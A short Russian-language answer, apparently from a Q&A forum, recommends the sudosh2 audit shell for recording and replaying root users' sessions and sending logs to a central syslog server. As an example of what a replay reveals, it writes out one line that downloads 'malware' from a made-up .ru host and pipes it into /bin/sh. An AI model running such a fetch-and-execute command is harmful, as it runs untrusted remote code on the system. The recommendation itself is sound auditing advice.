Доверяй, но проверяй!
Проверьте sudosh2 . sudosh2 предоставляется портами FreeBSD. Пакеты доступны для RedHat и Ubuntu. Вот описание с их сайта:
sudosh - это фильтр оболочки аудита, который можно использовать как оболочку входа в систему. Sudosh записывает все нажатия клавиш и вывод и может воспроизводить сеанс так же, как видеомагнитофон.
Sudosh позволит вам воспроизвести сеанс пользователя, что позволит вам видеть весь ввод и вывод так, как его видел пользователь. Вы видите все, нажатия клавиш, опечатки, возвраты, что они редактировали vi
, вывод wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
и т. Д.
Можно отправлять журналы sudosh в syslog, чтобы они могли храниться на центральном сервере syslog вне системы.
Обратите внимание, что sudosh2 является заменой sudosh, который был оставлен его автором.
Работаете ли вы в академическом учреждении, где пользователи настаивают на привилегиях суперпользователя? Или вы работаете в корпорации и хотите, чтобы пользователи имели привилегии суперпользователя на своих виртуальных машинах? Это может быть решением для вас.